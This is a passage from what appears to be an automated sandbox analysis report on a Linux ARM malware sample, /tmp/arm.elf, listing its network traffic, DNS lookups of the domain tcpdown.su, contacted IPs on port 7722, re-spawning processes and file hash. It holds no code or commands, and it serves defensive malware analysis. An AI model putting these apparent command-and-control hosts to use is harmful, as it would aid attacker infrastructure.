                                              Jan 7, 2025 00:51:08.375961065 CET26013829423.94.242.130192.168.2.15
                                              Jan 7, 2025 00:51:08.376060009 CET382942601192.168.2.1523.94.242.130
                                              Jan 7, 2025 00:51:08.376146078 CET382942601192.168.2.1523.94.242.130
                                              Jan 7, 2025 00:51:17.234035969 CET441247722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:51:17.238948107 CET772244124107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:51:17.239026070 CET441247722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:51:17.239517927 CET441247722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:51:17.239630938 CET441247722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:51:17.244302988 CET772244124107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:51:17.286793947 CET772244124107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:51:17.624449015 CET772244124107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:51:17.624671936 CET441247722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:51:20.419904947 CET441267722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:51:20.424808025 CET772244126107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:51:20.424869061 CET441267722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:51:20.425601959 CET441267722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:51:20.425734043 CET441267722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:51:20.430407047 CET772244126107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:51:20.471054077 CET772244126107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:51:20.892263889 CET772244126107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:51:20.892354965 CET441267722192.168.2.15107.175.130.16

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 7, 2025 00:49:20.203111887 CET5116953192.168.2.151.1.1.1
                                              Jan 7, 2025 00:49:20.210396051 CET53511691.1.1.1192.168.2.15
                                              Jan 7, 2025 00:49:20.213578939 CET5261553192.168.2.151.1.1.1
                                              Jan 7, 2025 00:49:20.232928991 CET53526151.1.1.1192.168.2.15
                                              Jan 7, 2025 00:49:20.236125946 CET5134353192.168.2.151.1.1.1
                                              Jan 7, 2025 00:49:20.244028091 CET53513431.1.1.1192.168.2.15
                                              Jan 7, 2025 00:49:20.246568918 CET4293253192.168.2.151.1.1.1
                                              Jan 7, 2025 00:49:20.255247116 CET53429321.1.1.1192.168.2.15
                                              Jan 7, 2025 00:49:20.257728100 CET6091853192.168.2.151.1.1.1
                                              Jan 7, 2025 00:49:20.279859066 CET53609181.1.1.1192.168.2.15
                                              Jan 7, 2025 00:49:20.282685995 CET5158353192.168.2.151.1.1.1
                                              Jan 7, 2025 00:49:20.297296047 CET53515831.1.1.1192.168.2.15
                                              Jan 7, 2025 00:49:21.962519884 CET3785953192.168.2.151.1.1.1
                                              Jan 7, 2025 00:49:21.971353054 CET53378591.1.1.1192.168.2.15
                                              Jan 7, 2025 00:49:22.011538029 CET5710853192.168.2.151.1.1.1
                                              Jan 7, 2025 00:49:22.027827024 CET53571081.1.1.1192.168.2.15
                                              Jan 7, 2025 00:49:22.062463045 CET6014653192.168.2.151.1.1.1
                                              Jan 7, 2025 00:49:22.071554899 CET53601461.1.1.1192.168.2.15
                                              Jan 7, 2025 00:49:22.109332085 CET5534153192.168.2.151.1.1.1
                                              Jan 7, 2025 00:49:22.121393919 CET53553411.1.1.1192.168.2.15
                                              Jan 7, 2025 00:49:22.176521063 CET5464353192.168.2.151.1.1.1
                                              Jan 7, 2025 00:49:22.195101023 CET53546431.1.1.1192.168.2.15
                                              Jan 7, 2025 00:49:22.200135946 CET5223153192.168.2.151.1.1.1
                                              Jan 7, 2025 00:49:27.286417007 CET3788853192.168.2.151.1.1.1
                                              Jan 7, 2025 00:49:32.324475050 CET5850153192.168.2.151.1.1.1
                                              Jan 7, 2025 00:49:37.390095949 CET4498053192.168.2.151.1.1.1
                                              Jan 7, 2025 00:49:42.446170092 CET5745653192.168.2.151.1.1.1
                                              Jan 7, 2025 00:49:49.130073071 CET4410453192.168.2.151.1.1.1
                                              Jan 7, 2025 00:49:49.149394989 CET53441041.1.1.1192.168.2.15
                                              Jan 7, 2025 00:49:49.150305986 CET5827153192.168.2.151.1.1.1
                                              Jan 7, 2025 00:49:49.159261942 CET53582711.1.1.1192.168.2.15
                                              Jan 7, 2025 00:49:49.159936905 CET3664353192.168.2.151.1.1.1
                                              Jan 7, 2025 00:49:49.179117918 CET53366431.1.1.1192.168.2.15
                                              Jan 7, 2025 00:49:49.179838896 CET4068753192.168.2.151.1.1.1
                                              Jan 7, 2025 00:49:49.194152117 CET53406871.1.1.1192.168.2.15
                                              Jan 7, 2025 00:49:49.194820881 CET3953553192.168.2.151.1.1.1
                                              Jan 7, 2025 00:49:49.203732014 CET53395351.1.1.1192.168.2.15
                                              Jan 7, 2025 00:49:49.204493999 CET5500353192.168.2.151.1.1.1
                                              Jan 7, 2025 00:49:54.207454920 CET5390253192.168.2.151.1.1.1
                                              Jan 7, 2025 00:49:59.211236000 CET3903653192.168.2.151.1.1.1
                                              Jan 7, 2025 00:50:04.215148926 CET4015353192.168.2.151.1.1.1
                                              Jan 7, 2025 00:50:09.219044924 CET3429253192.168.2.151.1.1.1
                                              Jan 7, 2025 00:50:15.905611992 CET4911353192.168.2.151.1.1.1
                                              Jan 7, 2025 00:50:15.912703037 CET53491131.1.1.1192.168.2.15
                                              Jan 7, 2025 00:50:15.913337946 CET4348853192.168.2.151.1.1.1
                                              Jan 7, 2025 00:50:15.919862986 CET53434881.1.1.1192.168.2.15
                                              Jan 7, 2025 00:50:15.920803070 CET4108253192.168.2.151.1.1.1
                                              Jan 7, 2025 00:50:15.927831888 CET53410821.1.1.1192.168.2.15
                                              Jan 7, 2025 00:50:15.928713083 CET4978253192.168.2.151.1.1.1
                                              Jan 7, 2025 00:50:15.943259954 CET53497821.1.1.1192.168.2.15
                                              Jan 7, 2025 00:50:15.944184065 CET3572153192.168.2.151.1.1.1
                                              Jan 7, 2025 00:50:15.954325914 CET53357211.1.1.1192.168.2.15
                                              Jan 7, 2025 00:50:15.955281019 CET3511353192.168.2.151.1.1.1
                                              Jan 7, 2025 00:50:20.960047007 CET4049753192.168.2.151.1.1.1
                                              Jan 7, 2025 00:50:25.962661028 CET5306053192.168.2.151.1.1.1
                                              Jan 7, 2025 00:50:30.966852903 CET4798053192.168.2.151.1.1.1
                                              Jan 7, 2025 00:50:35.972708941 CET5157753192.168.2.151.1.1.1
                                              Jan 7, 2025 00:50:42.643537998 CET5240153192.168.2.151.1.1.1
                                              Jan 7, 2025 00:50:42.651746988 CET53524011.1.1.1192.168.2.15
                                              Jan 7, 2025 00:50:42.652729034 CET5307853192.168.2.151.1.1.1
                                              Jan 7, 2025 00:50:42.659773111 CET53530781.1.1.1192.168.2.15
                                              Jan 7, 2025 00:50:42.660671949 CET4588253192.168.2.151.1.1.1
                                              Jan 7, 2025 00:50:42.668668985 CET53458821.1.1.1192.168.2.15
                                              Jan 7, 2025 00:50:42.669612885 CET3900553192.168.2.151.1.1.1
                                              Jan 7, 2025 00:50:42.676140070 CET53390051.1.1.1192.168.2.15
                                              Jan 7, 2025 00:50:42.677016973 CET3541753192.168.2.151.1.1.1
                                              Jan 7, 2025 00:50:42.684133053 CET53354171.1.1.1192.168.2.15
                                              Jan 7, 2025 00:50:42.685318947 CET4849753192.168.2.151.1.1.1
                                              Jan 7, 2025 00:50:47.690378904 CET6082453192.168.2.151.1.1.1
                                              Jan 7, 2025 00:50:52.696405888 CET5024453192.168.2.151.1.1.1
                                              Jan 7, 2025 00:50:57.702548027 CET4285253192.168.2.151.1.1.1
                                              Jan 7, 2025 00:51:02.705864906 CET4189653192.168.2.151.1.1.1
                                              Jan 7, 2025 00:51:09.377875090 CET5142853192.168.2.151.1.1.1
                                              Jan 7, 2025 00:51:09.385109901 CET53514281.1.1.1192.168.2.15
                                              Jan 7, 2025 00:51:09.385952950 CET5509453192.168.2.151.1.1.1
                                              Jan 7, 2025 00:51:09.393466949 CET53550941.1.1.1192.168.2.15
                                              Jan 7, 2025 00:51:09.394264936 CET5072053192.168.2.151.1.1.1
                                              Jan 7, 2025 00:51:09.408421040 CET53507201.1.1.1192.168.2.15
                                              Jan 7, 2025 00:51:09.409236908 CET3632253192.168.2.151.1.1.1
                                              Jan 7, 2025 00:51:09.416218042 CET53363221.1.1.1192.168.2.15
                                              Jan 7, 2025 00:51:09.416981936 CET5744653192.168.2.151.1.1.1
                                              Jan 7, 2025 00:51:09.433983088 CET53574461.1.1.1192.168.2.15
                                              Jan 7, 2025 00:51:09.434779882 CET5536853192.168.2.151.1.1.1
                                              Jan 7, 2025 00:51:14.437225103 CET4368353192.168.2.151.1.1.1
                                              Jan 7, 2025 00:51:19.443339109 CET5611553192.168.2.151.1.1.1

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Jan 7, 2025 00:49:20.203111887 CET192.168.2.151.1.1.10x3294Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:49:20.213578939 CET192.168.2.151.1.1.10x12feStandard query (0)tcpdown.su|1A (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:49:20.236125946 CET192.168.2.151.1.1.10x12feStandard query (0)tcpdown.su|1A (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:49:20.246568918 CET192.168.2.151.1.1.10x12feStandard query (0)tcpdown.su|1A (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:49:20.257728100 CET192.168.2.151.1.1.10x12feStandard query (0)tcpdown.su|1A (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:49:20.282685995 CET192.168.2.151.1.1.10x12feStandard query (0)tcpdown.su|1A (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:49:21.962519884 CET192.168.2.151.1.1.10xb308Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:49:22.011538029 CET192.168.2.151.1.1.10xb308Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:49:22.062463045 CET192.168.2.151.1.1.10xb308Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:49:22.109332085 CET192.168.2.151.1.1.10xb308Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:49:22.176521063 CET192.168.2.151.1.1.10xb308Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:49:22.200135946 CET192.168.2.151.1.1.10x2131Standard query (0)tcpdown.suo. [malformed]256261false
                                              Jan 7, 2025 00:49:27.286417007 CET192.168.2.151.1.1.10x2131Standard query (0)tcpdown.suo. [malformed]256263false
                                              Jan 7, 2025 00:49:32.324475050 CET192.168.2.151.1.1.10x2131Standard query (0)tcpdown.suo. [malformed]256268false
                                              Jan 7, 2025 00:49:37.390095949 CET192.168.2.151.1.1.10x2131Standard query (0)tcpdown.suo. [malformed]256273false
                                              Jan 7, 2025 00:49:42.446170092 CET192.168.2.151.1.1.10x2131Standard query (0)tcpdown.suo. [malformed]256278false
                                              Jan 7, 2025 00:49:49.130073071 CET192.168.2.151.1.1.10x93c0Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:49:49.150305986 CET192.168.2.151.1.1.10x93c0Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:49:49.159936905 CET192.168.2.151.1.1.10x93c0Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:49:49.179838896 CET192.168.2.151.1.1.10x93c0Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:49:49.194820881 CET192.168.2.151.1.1.10x93c0Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:49:49.204493999 CET192.168.2.151.1.1.10x6778Standard query (0)tcpdown.suo. [malformed]256288false
                                              Jan 7, 2025 00:49:54.207454920 CET192.168.2.151.1.1.10x6778Standard query (0)tcpdown.suo. [malformed]256293false
                                              Jan 7, 2025 00:49:59.211236000 CET192.168.2.151.1.1.10x6778Standard query (0)tcpdown.suo. [malformed]256298false
                                              Jan 7, 2025 00:50:04.215148926 CET192.168.2.151.1.1.10x6778Standard query (0)tcpdown.suo. [malformed]256301false
                                              Jan 7, 2025 00:50:09.219044924 CET192.168.2.151.1.1.10x6778Standard query (0)tcpdown.suo. [malformed]256308false
                                              Jan 7, 2025 00:50:15.905611992 CET192.168.2.151.1.1.10x6aadStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:50:15.913337946 CET192.168.2.151.1.1.10x6aadStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:50:15.920803070 CET192.168.2.151.1.1.10x6aadStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:50:15.928713083 CET192.168.2.151.1.1.10x6aadStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:50:15.944184065 CET192.168.2.151.1.1.10x6aadStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:50:15.955281019 CET192.168.2.151.1.1.10x9b09Standard query (0)tcpdown.suo. [malformed]256313false
                                              Jan 7, 2025 00:50:20.960047007 CET192.168.2.151.1.1.10x9b09Standard query (0)tcpdown.suo. [malformed]256318false
                                              Jan 7, 2025 00:50:25.962661028 CET192.168.2.151.1.1.10x9b09Standard query (0)tcpdown.suo. [malformed]256323false
                                              Jan 7, 2025 00:50:30.966852903 CET192.168.2.151.1.1.10x9b09Standard query (0)tcpdown.suo. [malformed]256328false
                                              Jan 7, 2025 00:50:35.972708941 CET192.168.2.151.1.1.10x9b09Standard query (0)tcpdown.suo. [malformed]256333false
                                              Jan 7, 2025 00:50:42.643537998 CET192.168.2.151.1.1.10xe982Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:50:42.652729034 CET192.168.2.151.1.1.10xe982Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:50:42.660671949 CET192.168.2.151.1.1.10xe982Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:50:42.669612885 CET192.168.2.151.1.1.10xe982Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:50:42.677016973 CET192.168.2.151.1.1.10xe982Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:50:42.685318947 CET192.168.2.151.1.1.10xd089Standard query (0)tcpdown.suo. [malformed]256343false
                                              Jan 7, 2025 00:50:47.690378904 CET192.168.2.151.1.1.10xd089Standard query (0)tcpdown.suo. [malformed]256346false
                                              Jan 7, 2025 00:50:52.696405888 CET192.168.2.151.1.1.10xd089Standard query (0)tcpdown.suo. [malformed]256353false
                                              Jan 7, 2025 00:50:57.702548027 CET192.168.2.151.1.1.10xd089Standard query (0)tcpdown.suo. [malformed]256358false
                                              Jan 7, 2025 00:51:02.705864906 CET192.168.2.151.1.1.10xd089Standard query (0)tcpdown.suo. [malformed]256358false
                                              Jan 7, 2025 00:51:09.377875090 CET192.168.2.151.1.1.10x1e15Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:51:09.385952950 CET192.168.2.151.1.1.10x1e15Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:51:09.394264936 CET192.168.2.151.1.1.10x1e15Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:51:09.409236908 CET192.168.2.151.1.1.10x1e15Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:51:09.416981936 CET192.168.2.151.1.1.10x1e15Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:51:09.434779882 CET192.168.2.151.1.1.10xdcd6Standard query (0)tcpdown.suo. [malformed]256370false
                                              Jan 7, 2025 00:51:14.437225103 CET192.168.2.151.1.1.10xdcd6Standard query (0)tcpdown.suo. [malformed]256373false
                                              Jan 7, 2025 00:51:19.443339109 CET192.168.2.151.1.1.10xdcd6Standard query (0)tcpdown.suo. [malformed]256376false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Jan 7, 2025 00:49:20.210396051 CET1.1.1.1192.168.2.150x3294No error (0)tcpdown.su45.200.149.96A (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:49:20.210396051 CET1.1.1.1192.168.2.150x3294No error (0)tcpdown.su45.200.149.167A (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:49:20.210396051 CET1.1.1.1192.168.2.150x3294No error (0)tcpdown.su104.168.33.8A (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:49:20.210396051 CET1.1.1.1192.168.2.150x3294No error (0)tcpdown.su23.94.37.42A (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:49:20.210396051 CET1.1.1.1192.168.2.150x3294No error (0)tcpdown.su23.94.242.130A (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:49:20.210396051 CET1.1.1.1192.168.2.150x3294No error (0)tcpdown.su45.200.149.95A (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:49:20.210396051 CET1.1.1.1192.168.2.150x3294No error (0)tcpdown.su45.200.149.249A (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:49:20.232928991 CET1.1.1.1192.168.2.150x12feName error (3)tcpdown.su|1nonenoneA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:49:20.244028091 CET1.1.1.1192.168.2.150x12feName error (3)tcpdown.su|1nonenoneA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:49:20.255247116 CET1.1.1.1192.168.2.150x12feName error (3)tcpdown.su|1nonenoneA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:49:20.279859066 CET1.1.1.1192.168.2.150x12feName error (3)tcpdown.su|1nonenoneA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:49:20.297296047 CET1.1.1.1192.168.2.150x12feName error (3)tcpdown.su|1nonenoneA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:49:21.971353054 CET1.1.1.1192.168.2.150xb308Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:49:22.027827024 CET1.1.1.1192.168.2.150xb308Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:49:22.071554899 CET1.1.1.1192.168.2.150xb308Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:49:22.121393919 CET1.1.1.1192.168.2.150xb308Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:49:22.195101023 CET1.1.1.1192.168.2.150xb308Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:49:49.149394989 CET1.1.1.1192.168.2.150x93c0Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:49:49.159261942 CET1.1.1.1192.168.2.150x93c0Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:49:49.179117918 CET1.1.1.1192.168.2.150x93c0Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:49:49.194152117 CET1.1.1.1192.168.2.150x93c0Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:49:49.203732014 CET1.1.1.1192.168.2.150x93c0Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:50:15.912703037 CET1.1.1.1192.168.2.150x6aadName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:50:15.919862986 CET1.1.1.1192.168.2.150x6aadName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:50:15.927831888 CET1.1.1.1192.168.2.150x6aadName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:50:15.943259954 CET1.1.1.1192.168.2.150x6aadName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:50:15.954325914 CET1.1.1.1192.168.2.150x6aadName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:50:42.651746988 CET1.1.1.1192.168.2.150xe982Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:50:42.659773111 CET1.1.1.1192.168.2.150xe982Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:50:42.668668985 CET1.1.1.1192.168.2.150xe982Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:50:42.684133053 CET1.1.1.1192.168.2.150xe982Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:51:09.385109901 CET1.1.1.1192.168.2.150x1e15Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:51:09.393466949 CET1.1.1.1192.168.2.150x1e15Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:51:09.408421040 CET1.1.1.1192.168.2.150x1e15Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:51:09.416218042 CET1.1.1.1192.168.2.150x1e15Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                              Jan 7, 2025 00:51:09.433983088 CET1.1.1.1192.168.2.150x1e15Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false

                                              System Behavior

                                              General

                                              Start time (UTC):23:49:16
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:/tmp/arm.elf
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:17
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:17
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:24
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:24
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:24
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:26
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:26
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:26
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:31
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:31
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:36
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:36
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:41
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:41
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:46
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:46
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:51
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:51
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:56
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:56
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:50:01
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:50:01
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:50:04
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:50:11
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:50:11
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:50:16
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:50:19
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:50:21
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:50:21
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:50:26
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
